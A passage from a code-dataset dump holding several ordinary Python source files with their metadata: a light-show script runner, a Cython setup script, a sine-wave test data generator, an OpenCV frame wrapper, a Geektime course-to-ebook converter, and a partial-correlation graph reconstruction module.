"usage_type": "call"}, {"api_name": "os.path.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 335, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 336, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 346, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 346, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 349, "usage_type": "call"}, {"api_name": "os.path.remove", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 361, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 364, "usage_type": "call"}, {"api_name": "forex_python.bitcoin.BtcConverter", "line_number": 377, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 378, "usage_type": "call"}]} +{"seq_id": "35473463", "text": "import time\nimport configparser\nfrom dataclasses import dataclass\nfrom datetime import datetime\n\n@dataclass\nclass Action:\n time: float\n box: int\n channel: int\n action: str\n\nclass ShowRunner:\n def __init__(self, powerBoxList, player, musicDir):\n self.powerBoxList = powerBoxList\n self.player = player\n self.musicDir = musicDir\n self.curentSong = \"\"\n self.actionList = []\n\n def readScript(self, scriptName):\n print(\"Reading script: \" + self.musicDir + '/' + scriptName + '.script')\n file = open(self.musicDir + '/' + scriptName + '.script', \"r\")\n self.actionList = []\n lines = []\n for line in file:\n# print(\"Line: \" + line)\n if (line != \"\\n\") and (not line.startswith('#')):\n lines.append(line.strip('\\n'))\n\n# for line in lines:\n# print(\"Good line: \" + line)\n\n # The first line should be the file name of the song to play\n self.currentSong = lines[0]\n\n for iter in range(1, len(lines)):\n# print(lines[iter])\n tokens = lines[iter].split(' ')\n newAction = Action(tokens[0], tokens[1], tokens[2], tokens[3])\n# print(\"Adding new action...\")\n# print(\" Time: \" + newAction.time)\n# print(\" Box: \" + newAction.box)\n# print(\" Channel: \" + newAction.channel)\n# print(\" Action: \" + newAction.action)\n self.actionList.append(newAction)\n return\n\n def runScript(self, endTime):\n if self.currentSong == \"\":\n print(\"No script currently loaded.\")\n return\n\n # Start the song\n if self.currentSong != \"none\":\n self.player.playSong(self.currentSong)\n\n # Set current time to zero. This will serve as the timer for running all of the actions.\n startTime = time.time()\n\n # Loop through the actions and run them per the scripted time.\n for action in self.actionList:\n # Check to make sure we are not past the end time for the show\n now = datetime.now().time()\n if (now > endTime):\n break\n\n actionTime = float(action.time) + startTime\n currentTime = time.time()\n if (actionTime > currentTime):\n time.sleep(actionTime - currentTime)\n\n self.executeAction(action.box, action.channel, action.action)\n\n self.player.stop()\n\n return\n\n def executeAction(self, boxID, channelID, action):\n\n if str(boxID) == '*':\n for box in self.powerBoxList:\n self.powerBoxList[box].sendCmd('*', action)\n else:\n try:\n self.powerBoxList[int(boxID)].sendCmd(channelID, action)\n except Exception as e:\n print(e)\n return\n\n", "sub_path": "venv/src/ShowRunner.py", "file_name": "ShowRunner.py", "file_ext": "py", "file_size_in_byte": 2855, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dataclasses.dataclass", "line_number": 6, "usage_type": "name"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "name"}, {"api_name": "time.time", "line_number": 69, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "124273103", "text": "# -*- coding: utf-8 -*-\n\"\"\"pentapy: A toolbox for pentadiagonal matrizes.\"\"\"\nimport os\nfrom setuptools import setup, Extension\nfrom Cython.Build import cythonize\nimport numpy as np\n\n# cython extensions ###########################################################\n\nCY_MODULES = []\nCY_MODULES.append(\n Extension(\n \"pentapy.solver\",\n [os.path.join(\"pentapy\", \"solver.pyx\")],\n include_dirs=[np.get_include()],\n )\n)\nEXT_MODULES = cythonize(CY_MODULES) # annotate=True\n\n# embed signatures for sphinx\nfor ext_m in EXT_MODULES:\n ext_m.cython_directives = {\"embedsignature\": True}\n\n# setup #######################################################################\n\nsetup(ext_modules=EXT_MODULES, include_dirs=[np.get_include()])\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "setuptools.Extension", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.get_include", "line_number": 15, "usage_type": "call"}, {"api_name": "Cython.Build.cythonize", "line_number": 18, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.get_include", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "15833492", "text": "# Copyright 2018 The Yawn Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Test data in the form of a quantized sine wave with added noise.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom data.quantization import quantiles, quantize, dequantize\n\ndef get_numpy_data(dataset_size, number_of_bins, scale):\n \"\"\".\"\"\"\n limits = 2.0*np.pi*scale\n\n x = np.linspace(-limits, limits, dataset_size+1)\n y = np.sin(x)\n\n # Find a roughly even quantization\n bins = quantiles(y, number_of_bins)\n\n # Add noise\n locs = np.array([-0.2, 0.2])\n scales = np.ones(locs.size)/1e1\n coeffs = np.ones(locs.size)/2.0\n\n indices = np.random.multinomial(1, coeffs, size=y.size).argmax(axis=-1)\n y += np.random.normal(loc=locs[indices], scale=scales[indices])\n\n # Digitize\n data = quantize(y[:-1], bins)\n data_labels = quantize(y[1:], bins, dtype=np.int32)\n\n # Turn feature data into sample points again\n data = dequantize(data, bins)\n\n return data, data_labels, bins\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n data, _, _ = get_numpy_data(1000, 64, 2)\n plt.plot(data)\n plt.grid(True)\n plt.show()\n", "sub_path": "data/stochastic_quantized_sine_wave.py", "file_name": "stochastic_quantized_sine_wave.py", "file_ext": "py", "file_size_in_byte": 1854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.pi", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 30, "usage_type": "call"}, {"api_name": "data.quantization.quantiles", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "data.quantization", "line_number": 44, "usage_type": "name"}, {"api_name": "data.quantization.quantize", "line_number": 44, "usage_type": "call"}, {"api_name": "data.quantization.quantize", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "data.quantization", "line_number": 48, "usage_type": "name"}, {"api_name": "data.quantization.dequantize", "line_number": 48, "usage_type": "call"}, {"api_name": "data.quantization", "line_number": 50, "usage_type": "name"}, {"api_name": "data.quantization", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "data.quantization", "line_number": 56, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "617612278", "text": "import cv2\nimport numpy as np\nfrom operator import mul\n\ndef isLight(frame):\n return frame.gray.mean() >= 120\n \nclass Frame(object):\n def __init__(self, img, cap=None, **kwargs):\n self.cap = cap\n self.parent = kwargs.get('parent', None)\n self.roi = kwargs.get('roi', None)\n \n self._img = img\n if cap is not None:\n self._ret = None\n self._time = cap.get(cv2.CAP_PROP_POS_MSEC)/1000.0\n self.number = int(cap.get(cv2.CAP_PROP_POS_FRAMES))\n else:\n self._ret = 'still'\n self._gray = None\n\n def _retreive(self):\n self._ret, self._img = self.cap.retrieve()\n if self.roi is None:\n yRange, xRange = self._img.shape[:2]\n self.roi = ( (0,0), (xRange,yRange) )\n\n def _retreiveIfNecessary(self):\n if not self.retreived:\n self._retreive()\n \n @property\n def roi(self):\n return self._roi\n\n @roi.setter\n def roi(self, roi):\n if roi is None:\n self._roi = None\n else: \n try:\n pt1, pt2 = roi\n except TypeError as e:\n raise TypeError('{0} not valid ROI. Must be unpackable into two points, e.g. `pt1, pt2 = roi`'.format(roi))\n else:\n self._roi = roi\n \n @property\n def img(self):\n self._retreiveIfNecessary()\n if self.roi is None:\n return self._img\n else:\n pt1, pt2 = self.roi\n return self._img[pt1[1]:pt2[1], pt1[0]:pt2[0]]\n\n @property\n def gray(self):\n self._retreiveIfNecessary()\n if self._gray is None:\n self._gray = cv2.cvtColor(self._img, cv2.COLOR_BGR2GRAY)\n\n if self.roi is None:\n return self._gray\n else:\n pt1, pt2 = self.roi\n return self._gray[pt1[1]:pt2[1], pt1[0]:pt2[0]]\n\n @property\n def offset(self):\n if self.roi is None:\n return (0,0)\n else:\n pt1, pt2 = self.roi\n return (pt1[0], pt1[1])\n \n @property\n def time(self):\n return self._time\n \n @property\n def retreived(self):\n return self._ret is not None\n \n @property\n def mask(self):\n return np.zeros(self.gray.shape, np.uint8)\n\n def subFrame(self, roi):\n return Frame(self._img, self.cap, roi=roi)\n\n @property\n def area(self):\n return mul(*self.img.shape[:2])\n \n def __repr__(self):\n\n retreive_stat = 'still'\n if self._ret == 'still':\n retreive_state = 'still'\n elif self.retreived:\n retreive_state = 'retreived'\n else:\n retreive_state = 'not retreived'\n \n if self.cap is not None:\n cap_stat = 'number={0}, time={1}'.format(self.number, self.time)\n else:\n cap_stat = ''\n \n # shape statistics\n if self._ret == 'still' or self.retreived:\n shape = 'shape={0}'.format(self._img.shape)\n else:\n shape = ''\n\n if self.roi is not None:\n roi_stat = 'roi={0}'.format(self.roi)\n else:\n roi_stat = ''\n \n return ''.format(shape=shape,\n roi=roi_stat,\n cap_state=cap_stat,\n retreived=retreive_state)\n", "sub_path": "CMAnalytics/video/frame.py", "file_name": "frame.py", "file_ext": "py", "file_size_in_byte": 3592, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.CAP_PROP_POS_MSEC", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_POS_FRAMES", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 88, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "589958107", "text": "# coding=utf8\nimport re\nimport os\nimport json\nimport datetime\nfrom geektime_dl.data_client import DataClient\nfrom . import Command\nfrom ..geektime_ebook import maker\nfrom kindle_maker import make_mobi\nfrom geektime_dl.utils.mail import MailServer\n\n\nclass EBook(Command):\n \"\"\"将专栏文章制作成电子书\n\n geektime ebook [--out-dir=] [--enable-comments] [--comment-count=]\n\n `[]`表示可选,`<>`表示相应变量值\n\n course_id: 课程ID,可以从 query subcmd 查看\n --out_dir: 电子书存放目录,默认当前目录\n --enable-comments: 启动评论下载,默认不下载评论\n --comment-count: 在启动评论下载时,设置评论条数,默认10条\n\n notice: 此 subcmd 需要先执行 login subcmd\n e.g.: geektime ebook 48 --out-dir=~/geektime-ebook\n \"\"\"\n\n @staticmethod\n def _title(c):\n if not c['had_sub']:\n t = c['column_title'] + '[免费试读]'\n elif c['update_frequency'] == '全集':\n t = c['column_title'] + '[更新完毕]'\n else:\n t = c['column_title'] + '[未完待续{}]'.format(datetime.date.today())\n return t\n\n def replace_window_file_name(self, file_name):\n file_name = re.sub(r'[ ??//::**<《》>\\|丨|、\\\\&]', '_', file_name) # windows not allowed\n file_name = re.sub(r'([0-9])_*', r'\\1', file_name) # number\n file_name = re.sub('_*$', '', file_name) # end\n file_name = re.sub('__', '_', file_name)\n file_name = re.sub('__', '_', file_name)\n return file_name\n\n def render_column_source_files(self, course_intro, course_content, out_dir, force=False):\n\n # TODO refactor here\n # cover and introduction\n course_intro = course_intro\n articles = course_content\n course_intro['column_title'] = self.replace_window_file_name(course_intro['column_title'])\n column_title = course_intro['column_title']\n for article in articles:\n article['article_title'] = self.replace_window_file_name(article['article_title'])\n\n output_dir = os.path.join(out_dir, column_title)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n print('mkdir ' + output_dir)\n\n if not force and os.path.isfile(os.path.join(output_dir, '{}.html'.format('简介'))):\n print('简介' + ' exists')\n else:\n maker.render_article_html('简介', maker.parse_image(course_intro['column_intro'], output_dir), output_dir)\n print('下载' + column_title + '简介' + ' done')\n maker.generate_cover_img(course_intro['column_cover'], output_dir)\n print('下载' + column_title + '封面' + ' done')\n\n ebook_name = self._title(course_intro)\n maker.render_toc_md(\n ebook_name + '\\n',\n ['# 简介\\n'] + ['# ' + maker.format_file_name(t['article_title']) + '\\n' for t in articles],\n output_dir\n )\n print('下载' + column_title + '目录' + ' done')\n\n for article in articles:\n article_title = article['article_title']\n title = maker.format_file_name(article_title)\n if not force and os.path.isfile(os.path.join(output_dir, '{}.html'.format(title))):\n print(title + ' exists')\n continue\n maker.render_article_html(title, maker.parse_image(article['article_content'], output_dir), output_dir)\n print('下载' + column_title + ':' + article_title + ' done')\n\n def run(self, args):\n\n course_id = args[0]\n for arg in args[1:]:\n if '--out-dir=' in arg:\n out_dir = arg.split('--out-dir=')[1] or './ebook'\n break\n else:\n out_dir = './ebook'\n\n force = '--force' in args[1:]\n enable_comments = '--enable-comments' in args[1:]\n source_only = '--source-only' in args[1:]\n push = '--push' in args[1:]\n\n for arg in args[1:]:\n if '--comment-count=' in arg:\n comment_count = arg.split('--comment-count=')[1] or 10\n break\n else:\n comment_count = 10\n\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n\n dc = DataClient()\n course_data = dc.get_course_intro(course_id, force=True)\n\n if int(course_data['column_type']) not in (1, 2):\n raise Exception('该课程不提供文本:%s' % course_data['column_title'])\n\n # data\n data = dc.get_course_content(course_id, force=force)\n\n if enable_comments:\n for post in data:\n post['article_content'] += self._render_comment_html(post['comments'], comment_count)\n\n # source file\n course_data['column_title'] = maker.format_file_name(course_data['column_title'])\n self.render_column_source_files(course_data, data, out_dir, force=force)\n\n # ebook\n if not source_only:\n if course_data['update_frequency'] == '全集' and os.path.isfile(\n os.path.join(out_dir, self._title(course_data)) + '.mobi'):\n print(\"{} exists \".format(self._title(course_data)))\n else:\n make_mobi(source_dir=os.path.join(out_dir, course_data['column_title']), output_dir=out_dir)\n if push:\n\n fn = os.path.join(out_dir, \"{}.mobi\".format(self._title(course_data)))\n if os.path.getsize(fn) / 1024.0 / 1024 > 50:\n print(\"电子书大小超过50M\")\n return\n f = open(fn, 'rb')\n d = f.read()\n f.close()\n\n with open('smtp.conf') as f:\n smtp_conf = json.loads(f.read())\n m = MailServer(host=smtp_conf['host'], port=smtp_conf['port'], user=smtp_conf['user'],\n password=smtp_conf['password'], encryption=smtp_conf['encryption'])\n message = m.build_email(email_to=smtp_conf['email_to'], subject='convert', body='',\n attachments=[(\"{}.mobi\".format(self._title(course_data)), d)])\n m.send_email(message)\n print(\"push to kindle done\")\n\n def _timestamp2str(self, timestamp):\n if not timestamp:\n return ''\n\n return datetime.datetime.fromtimestamp(int(timestamp)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n def _render(self, c):\n replies = json.loads(c.get('replies'))\n\n reply = replies[0] if replies else {}\n replies_html = \"\"\"
\n
\n
{}{}
\n
{}
\n
\n \"\"\".format(reply.get('user_name'), self._timestamp2str(reply.get('ctime')),\n reply.get('content')) if reply else ''\n\n c_html = \"\"\"\n
  • \n
    \n
    \n {user_name} {comment_time}\n
    \n
    \n {comment_content} {like_count}\n
    \n {replies}\n
    \n
  • \n \"\"\".format(user_name=c['user_name'], like_count=\"[{}赞]\".format(c['like_count']) if c['like_count'] else '',\n comment_content=c['comment_content'],\n comment_time=self._timestamp2str(c['comment_ctime']), replies=replies_html)\n return c_html\n\n def _render_comment_html(self, comments, comment_count):\n if not comments:\n return ''\n\n count = min(len(comments), int(comment_count))\n comments = comments[:count]\n\n html = '\\n
    \\n'.join([\n self._render(c)\n for c in comments\n ])\n h = \"\"\"

    精选留言:

    \n
      \n \"\"\"\n f = '
    '\n return h + html + f\n\n\nclass EbookBatch(EBook):\n \"\"\"批量制作电子书\n 懒, 不想写参数了\n \"\"\"\n\n def run(self, args):\n if '--all' in args:\n dc = DataClient()\n data = dc.get_course_list()\n\n for i in [1, 2]:\n for c in data[str(i)]['list']:\n if not c['had_sub']:\n continue\n if True:\n # if c['update_frequency'] == '全集':\n try:\n super(EbookBatch, self).run([str(c['id'])] + args)\n print('\\n')\n except Exception as e:\n print(e)\n # else:\n # super(EbookBatch, self).run([str(c['id']), '--source-only'] + args)\n # print('\\n')\n\n else:\n course_ids = args[0]\n cid_list = course_ids.split(',')\n\n for cid in cid_list:\n super(EbookBatch, self).run([cid.strip()] + args)\n print('\\n')\n", "sub_path": "geektime_dl/cli/ebook.py", "file_name": "ebook.py", "file_ext": "py", "file_size_in_byte": 9218, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.date.today", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 36, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 40, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 41, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 42, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 43, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.render_article_html", "line_number": 66, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 66, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.parse_image", "line_number": 66, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.generate_cover_img", "line_number": 68, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 68, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.render_toc_md", "line_number": 72, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 72, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.format_file_name", "line_number": 74, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 74, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.format_file_name", "line_number": 81, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.render_article_html", "line_number": 85, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 85, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.parse_image", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 111, "usage_type": "call"}, {"api_name": "geektime_dl.data_client.DataClient", "line_number": 113, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.format_file_name", "line_number": 127, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 127, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "kindle_maker.make_mobi", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 148, "usage_type": "call"}, {"api_name": "geektime_dl.utils.mail.MailServer", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 160, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 160, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 163, "usage_type": "call"}, {"api_name": "geektime_dl.data_client.DataClient", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "476035165", "text": "\"\"\"\npartial_correlation_influence.py\n--------------------------------\n\nReconstruction of graphs using the partial correlation influence, as defined in:\n\nKenett, D. Y. et al. Dominating clasp of the financial sector revealed by\npartial correlation analysis of the stock market. PLoS ONE 5, e15032 (2010).\n\nThe index variable option as in:\n\nKenett, D. Y., Huang, X., Vodenska, I., Havlin, S. & Stanley, H. E. Partial correlation\nanalysis: applications for financial markets. Quantitative Finance 15, 569–578 (2015).\n\n\nauthor: Carolina Mattsson\nemail: mattsson dot c at northeastern dot edu\nSubmitted as part of the 2019 NetSI Collabathon\n\"\"\"\nfrom .base import BaseReconstructor\nimport numpy as np\nimport networkx as nx\nfrom scipy import stats, linalg\nfrom ..utilities import create_graph, threshold\n\n\nclass PartialCorrelationInfluence(BaseReconstructor):\n \"\"\"Uses average effect from a sensor to all others.\"\"\"\n\n def fit(self, TS, index=None, threshold_type='range', **kwargs):\n r\"\"\"Uses the average effect of a series :math:`Z` on the correlation between\n a series :math:`X` and all other series.\n\n The partial correlation influence:\n\n .. math::\n\n d(X:Z) = _Y \\neq X,\n\n where :math:`d(X,Y:Z) = \\rho(X,Y) - \\rho(X,Y:Z)`\n\n\n If an index is given, both terms become partial correlations:\n\n .. math::\n\n d(X,Y:Z) ≡ ρ(X,Y:M) − ρ(X,Y:M,Z)\n\n\n The results dictionary also stores the matrix of partial\n correlations as `'weights_matrix'` and the thresholded version of\n the partial correlation matrix as `'thresholded_matrix'`.\n\n Parameters\n ----------\n\n index (int, array of ints, or None)\n Take the partial correlations of each pair of elements holding\n constant an index variable or set of index variables. If None,\n take the partial correlations of the variables holding constant\n all other variables.\n\n threshold_type (str):\n Which thresholding function to use on the matrix of\n weights. See `netrd.utilities.threshold.py` for\n documentation. Pass additional arguments to the thresholder\n using ``**kwargs``.\n\n Returns\n -------\n\n G (nx.Graph)\n a reconstructed graph.\n\n References\n -----------\n\n .. [1] Kenett, D. Y. et al. Dominating clasp of the financial\n sector revealed by partial correlation analysis of the stock\n market. PLoS ONE 5, e15032 (2010).\n\n .. [2] Kenett, D. Y., Huang, X., Vodenska, I., Havlin, S. &\n Stanley, H. E. Partial correlation analysis: applications\n for financial markets. Quantitative Finance 15, 569–578\n (2015).\n\n \"\"\"\n if index:\n p_cor = partial_corr(TS, index=index)\n n_TS = p_cor.shape[0]\n p_cor = np.delete(p_cor, index, axis=0)\n p_cor = np.delete(p_cor, index, axis=1)\n else:\n p_cor = partial_corr(TS)\n\n np.fill_diagonal(p_cor, float(\"nan\"))\n\n n = p_cor.shape[0]\n\n p_cor_zs = np.zeros((n, n, n))\n\n if index:\n for k, z in enumerate(np.delete(range(n_TS), index)):\n index_z = np.append(index, z)\n p_cor_z = partial_corr(TS, index=index_z)\n p_cor_z = np.delete(p_cor_z, index, axis=0)\n p_cor_z = np.delete(p_cor_z, index, axis=1)\n p_cor_z = p_cor - p_cor_z\n p_cor_z[:, k] = float(\"nan\")\n p_cor_z[k, :] = -np.inf\n p_cor_zs[z] = p_cor_z\n else:\n index = np.array([], dtype=int)\n for z in range(n):\n index_z = z\n p_cor_z = partial_corr(TS, index=index_z)\n p_cor_z = p_cor - p_cor_z\n p_cor_z[:, z] = float(\"nan\")\n p_cor_z[z, :] = -np.inf\n p_cor_zs[z] = p_cor_z\n\n p_cor_inf = np.nanmean(p_cor_zs, axis=2) # mean over the Y axis\n\n self.results['weights_matrix'] = p_cor_inf\n\n # threshold the network\n W_thresh = threshold(p_cor_inf, threshold_type, **kwargs)\n\n # construct the network\n self.results['graph'] = create_graph(W_thresh)\n self.results['thresholded_matrix'] = W_thresh\n\n G = self.results['graph']\n\n return G\n\n\n# This partial correlation function is adapted from Fabian Pedregosa-Izquierdo's\n# implementation of partial correlation in Python, found at [this gist](\n# https://gist.github.com/fabianp/9396204419c7b638d38f)\n\"\"\"\nPartial Correlation in Python (clone of Matlab's partialcorr)\n\nThis uses the linear regression approach to compute the partial\ncorrelation (might be slow for a huge number of variables). The\nalgorithm is detailed here:\n\n http://en.wikipedia.org/wiki/Partial_correlation#Using_linear_regression\n\nTaking X and Y two variables of interest and Z the matrix with all the variable minus {X, Y},\nthe algorithm can be summarized as\n\n 1) perform a normal linear least-squares regression with X as the target and Z as the predictor\n 2) calculate the residuals in Step #1\n 3) perform a normal linear least-squares regression with Y as the target and Z as the predictor\n 4) calculate the residuals in Step #3\n 5) calculate the correlation coefficient between the residuals from Steps #2 and #4;\n\n The result is the partial correlation between X and Y while controlling for the effect of Z\n\n\nDate: Nov 2014\nAuthor: Fabian Pedregosa-Izquierdo, f@bianp.net\nTesting: Valentina Borghesani, valentinaborghesani@gmail.com\n\"\"\"\n\n\ndef partial_corr(C, index=None):\n \"\"\"Returns the sample linear partial correlation coefficients between pairs of\n variables in C, controlling for the remaining variables in C.\n\n\n Parameters\n ----------\n C : array-like, shape (p, n)\n Array with the different variables. Each row of C is taken as a variable\n\n\n Returns -------\n P : array-like, shape (p, p)\n P[i, j] contains the partial correlation of C[:, i] and C[:, j]\n controlling for the remaining variables in C.\n\n \"\"\"\n\n C = np.asarray(C).T\n p = C.shape[1]\n P_corr = np.zeros((p, p), dtype=np.float)\n\n for i in range(p):\n P_corr[i, i] = 1\n for j in range(i + 1, p):\n if index is None:\n idx = np.ones(p, dtype=np.bool)\n idx[i] = False\n idx[j] = False\n elif type(index) is int or (\n isinstance(index, np.ndarray)\n and issubclass(index.dtype.type, np.integer)\n ):\n idx = np.zeros(p, dtype=np.bool)\n idx[index] = True\n else:\n raise ValueError(\n \"Index must be an integer, an array of \" \"integers, or None.\"\n )\n\n beta_i = linalg.lstsq(C[:, idx], C[:, j])[0]\n beta_j = linalg.lstsq(C[:, idx], C[:, i])[0]\n\n res_j = C[:, j] - C[:, idx].dot(beta_i)\n res_i = C[:, i] - C[:, idx].dot(beta_j)\n\n corr = stats.pearsonr(res_i, res_j)[0]\n P_corr[i, j] = corr\n P_corr[j, i] = corr\n\n return P_corr\n", "sub_path": "netrd/reconstruction/partial_correlation_influence.py", "file_name": "partial_correlation_influence.py", "file_ext": "py", "file_size_in_byte": 7248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.BaseReconstructor", "line_number": 27, "usage_type": "name"}, {"api_name": "numpy.delete", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", 